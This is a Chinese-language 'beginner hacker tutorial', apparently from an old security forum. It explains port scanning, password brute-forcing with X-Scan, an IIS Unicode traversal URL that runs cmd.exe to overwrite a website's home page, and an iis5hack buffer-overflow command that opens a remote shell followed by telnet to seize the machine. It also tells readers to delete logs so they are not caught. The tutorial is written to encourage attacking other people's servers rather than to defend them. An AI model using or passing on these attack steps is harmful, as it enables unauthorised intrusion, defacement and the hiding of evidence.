初级黑客教学

/ns/cn/tool/data/20050123004936.htm

各位老大//// 本文纯属个人见解 //// 如有不满竟请见谅
qq :249395079 emil:lovewxll@eyou.com


1. 扫端口(port)
port是一个很重要的东西,如果你知道他所有有开的port的话,那你就可以从某个port开始hacking.
22 SSH 爽拉
21 FTP重要哦
23 TELNET赚到拉
25 STMP没啥用ㄋㄟ
53 DOMAIN... 不想说了
80HTTP看网页用的拉
110POP收信的(要破E-MAIL吗?)
139 NETBOIS暴重要的!!!
3389win2000超级终端,最爽的一个
2. 破密码(password)
大部分的密码文件不是很好,不过有些很好<== 文件超大的,不过勉强可用,<== 可以自己加欧!

3. 万国码(UNICODE)
虽然很老了,不过还是有很多主机都有UNICODE的BUG. 像是韩国的,一堆, 大陆的呢? 少之又少,因为怕被HACK,所以都有补

4. 烘培鸡(FRONTPAGE)
很多人都以为说装的FRONTPAGE EXTEND,可以让网页变好,但是像很多HACKER,可以直接用FRONTPAGE直接改网页.
讲了那麽多,终於要开始来玩了<== 爽爽爽
首先要先挑一苹肥肥嫩嫩的来玩,就先玩 http://www.newhacker.com/ 吧(随便举例)
要先找到他的IP欧,所以呢,请到CMD来PING它吧
C:\>ping www.newhacker.com
Pinging www.newhacker.com [255.255.255.255] with 32 bytes of data:
Reply from 255.255.255.255: bytes=32 time=183ms TTL=238 ┅
阿他的IP不小心的被我PING出来了ㄟ
先扫扫看他的PORT 22 SSH,21 FTP,25 TELNET,53 DOMAIN,80 HTTP,110 POP,139 NETBOIS,3389 WIN2000 终端机 ┅ 真多PORT阿
改主页
请先拿出 X-SCAN 2.2 哈哈哈,他要死了,来扫unicode.
范例: http://www.newhacker.com/scripts ... /system32/cmd.exe?/
c+dir 哇,他的硬盘的东西都秀出来了欧. 来改他的主页,那先找到他的路径吧,请 dir 所有的文件夹来找吧,哈,他的路径是c:\inetpub\wwwroot\index.html
http://www.newhacker.com/scripts/..%c1%1c../winnt/system32/cmd”.exe?/c+echo+hackedbytaiwan+>c:\inetpub\wwwroot\index.html
cgi错误, 不用里他,现在到主页去看看.爽爽爽,我的名称被贴上去了,哈哈哈.
还有,要记的删除纪录欧,不然被抓我可不管欧.

IIS 溢出
据说缓冲区溢出攻击是黑客入侵时70%所选的方法，看起来有点夸张，但确实有道理，因为暴力密码破解在网络上变得非常之慢，而像unicode的解码漏洞所取得的权限又太低，而缓冲区溢出一般可取得system权限，是非常有用的！

具体原理我也不是很清楚，只能说个大概∶当我们向系统发出超出缓冲区大小的数据处理请求时，便会引发溢出，并弹出错误对话框，我们常看到的「非法操作」其实也是可能是由於溢出。而当溢出时，eip发生错误，有汇编知识的朋友应该记得，eip是控制执行代码的位置（顺便问一下，有没有会crack的高人，记得做我老师）这时加入一段恶性代码，算好发生溢出时的eip值，这样溢出时就会执行恶性代码而不是当掉。非法操作我们知道多的不得了，因此┅┅溢出攻击是非常强大的！

由於汇编对於我们来说较难掌握，加之对溢出的了解很有限，那麽我们只能借助高手们的程序来黑了。

具体方法∶

1，准备iishack，不要跟我要，该版本可以对多种系统进行攻击。

2，用x-scan或流光扫瞄一个有iis.printer漏洞的主机，然後就可以攻击了。

3，在命令行方式执行iis5hack (主机ip) (端口号，默认80）（系统代号，具体可参考程序的帮助） （ shell口）

例如∶iis5hack 255.255.255.255 80 1 111(以为在111端口开一个shell)

4,用telnet连上，telnet 255.255.255.255 111,成功的话就可以控制机器了，加个用户，做个代理┅┅

密码暴力破解
最好用的就是X-SCAN了,速度快,不过就是密码文件太滥了,有空的话可以自己加
设置一番，上路吧！你可以睡觉，可以去machine(就是做作业)，可以去读书┅┅就是不要傻等。为什麽呢？因为会伤视力的∶）


各位老大//// 本文纯属个人见解 //// 如有不满竟请见谅
qq :249395079 emil:lovewxll@eyou.com


===============================================
本文版权属20CN网络安全小组及其作者所有,如有转载,请保持文章完整性并注明出处
文章类型:原创 提交:小琪 核查:NetDemon